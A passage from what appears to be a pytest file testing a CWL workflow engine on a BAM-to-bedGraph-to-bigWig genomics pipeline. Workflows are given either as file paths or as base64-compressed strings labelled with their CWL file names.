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 zhXTfFcVnL/gosFZpps\
/GU8SmShNS4FB6wsEIYqpbGyfu61v/weDmYiG",
"bam-to-bedgraph-step.json",
"bam_to_bedgraph",
False
),
(
["workflows", "bam-bedgraph-bigwig.cwl"],
"sort-bedgraph-step.json",
"sort_bedgraph",
False
),
(
["workflows", "bam-bedgraph-bigwig-conditional.cwl"],
"sort-bedgraph-step-conditional-false.json",
"sort_bedgraph",
True
),
(
["workflows", "bam-bedgraph-bigwig-conditional.cwl"],
"sort-bedgraph-step-conditional-true.json",
"sort_bedgraph",
False
),
(
["workflows", "bam-bedgraph-bigwig.cwl"],
"sorted-bedgraph-to-bigwig-step.json",
"sorted_bedgraph_to_bigwig",
False
),
(
["workflows", "bam-bedgraph-bigwig-single.cwl"],
"bam-to-bedgraph-step.json",
"bam_to_bedgraph",
False
),
(
["workflows", "bam-bedgraph-bigwig-single.cwl"],
"sort-bedgraph-step.json",
"sort_bedgraph",
False
),
(
["workflows", "bam-bedgraph-bigwig-single.cwl"],
"sorted-bedgraph-to-bigwig-step.json",
"sorted_bedgraph_to_bigwig",
False
),
(
["workflows", "bam-bedgraph-bigwig-subworkflow.cwl"],
"bam-bedgraph-bigwig.json",
"subworkflow",
False
)
]
)
def test_execute_workflow_step(workflow, job, task_id, skipped_control):
pickle_folder = tempfile.mkdtemp()
if (isinstance(workflow, str)):
workflow_path = workflow
else:
workflow_path = os.path.join(DATA_FOLDER, *workflow)
job_path = os.path.join(DATA_FOLDER, "jobs", job)
cwl_args = {"pickle_folder": pickle_folder}
job_data = load_job(
workflow=workflow_path,
job=job_path,
cwl_args=cwl_args
)
job_data["tmp_folder"] = pickle_folder # need manually add "tmp_folder"
try:
step_outputs, step_report, skipped = execute_workflow_step(
workflow=workflow_path,
task_id=task_id,
job_data=job_data,
cwl_args=cwl_args
)
if skipped != skipped_control:
raise ValueError("Workflow didn't follow skipping rule")
except ValueError as err:
assert False, f"Failed to execute the workflow. \n {err}"
except BaseException as err:
assert False, f"Failed to run the test. \n {err}"
finally:
shutil.rmtree(pickle_folder)
@pytest.mark.parametrize(
"job, workflow",
[
(
"bam-bedgraph-bigwig.json",
["workflows", "bam-bedgraph-bigwig.cwl"]
),
(
"bam-bedgraph-bigwig.json",
# bam-bedgraph-bigwig-single.cwl
"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 zhXTfFcVnL/gosFZpps\
/GU8SmShNS4FB6wsEIYqpbGyfu61v/weDmYiG"
)
]
)
def test_load_job_from_file(job, workflow):
pickle_folder = tempfile.mkdtemp()
if (isinstance(workflow, str)):
workflow_path = workflow
else:
workflow_path = os.path.join(DATA_FOLDER, *workflow)
job_path = os.path.join(DATA_FOLDER, "jobs", job)
try:
job_data = load_job(
workflow=workflow_path,
job=job_path,
cwl_args={"pickle_folder": pickle_folder}
)
except BaseException as err:
assert False, f"Failed to load job from file"
finally:
shutil.rmtree(pickle_folder)
@pytest.mark.parametrize(
"job, workflow",
[
(
"bam-bedgraph-bigwig.json",
["workflows", "dummy.cwl"]
),
(
"bam-bedgraph-bigwig.json",
"nonenonenonenonenone"
),
(
"bam-bedgraph-bigwig.json",
# bam-bedgraph-bigwig.cwl
"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\
m3vwGItZCP"
)
]
)
def test_load_job_from_file_should_fail(job, workflow):
with pytest.raises(AssertionError):
test_load_job_from_file(job, workflow)
@pytest.mark.parametrize(
"job, workflow, cwd",
[
(
{
"bam_file": {
"class": "File",
"location": "../inputs/chr4_100_mapped_reads.bam"
},
"chrom_length_file": {
"class": "File",
"location": "../inputs/chr_name_length.txt"
},
"scale": 1
},
["workflows", "bam-bedgraph-bigwig.cwl"],
os.path.join(DATA_FOLDER, "jobs")
),
(
{
"bam_file": {
"class": "File",
"location": "../inputs/chr4_100_mapped_reads.bam"
},
"chrom_length_file": {
"class": "File",
"location": "../inputs/chr_name_length.txt"
},
"scale": 1
},
# bam-bedgraph-bigwig-single.cwl
"eNrtPA1X20iSf6Wf39zDnrFkMIFJnEAWCMlwm0AukMu9i/OwLLXtXmS1Ri1BSDb//aqqu/\
Vl2YZM5mb3PdidgKXuquqq6q7P9teWfxP+N0+UkFFrwFrXW+5mq8tafugphQ8+yORqEsob\
fJjw3zOR8DmPUnz38Wsx7Dzl8UkUZ+nx5zjhCsG9K0a3vnVZafBJFIqI/6d37Sk/EXFaGf\
kJEAmEhEO/tsbe/HIiQk4f0tsY/2i9xAcwLpC+hgfD2eHBG4Yju0zJJOUBG98yX8okEJGX\
coU0tPxZIueXIY+m6Wwt2AtvzAIeirlAaDRVKjnnTM8nZAP2jF6cenO+/+zi4HBffz4XX/\
g+oVS+V0MD7PTS5yVER5JPJsIXsH6WSkYzWDrjbMojxOfLa554U44r8uBTpFIPhk48P5UJ\
IZl7ccyDy4R7gbqMsvmYJxWUIqogfOslQG/KE0QH2PwsBBYZxJ5iW5v002sA67KTaSQTzd\
4xD1IpQ+VoQoFOF9SJiWgYodxSeQkjpokXz5gCBWFiYnAIxeJEXouAB8OIVhB7IvFnIq6Q\
PQbg3IvKpB9H3hgA4HAeODwKFphk14MajZAn8BRV61KBTFZx5ZwDT8VnWJqdwnAKm8hkLR\
KVJl4UVKDDIxFNK3LOOV0HJyfANJDHtRcqwC7nIGcVc1+AWjADG9GMxfRGTElzI5DgGnxn\
WYobw462CwGUtD3E9IOYarBGSj8IMA9eITTNmDgU6TqhLmcMQuaePwOBJymyCbcFwTQ7fO\
N0gwF32MaLDYZ6SkgDoG8tzpkXAQLNXOZpyHOkAcHgIcLGEnY5KT8QhMtEwRABuGgrFkQo\
iSHmxCpk1Hi66LHnMkt8zV46rfKdQruGQPTKkBaYr8VHMliU4Z0R52h7hgyLLPTGPCTWGW\
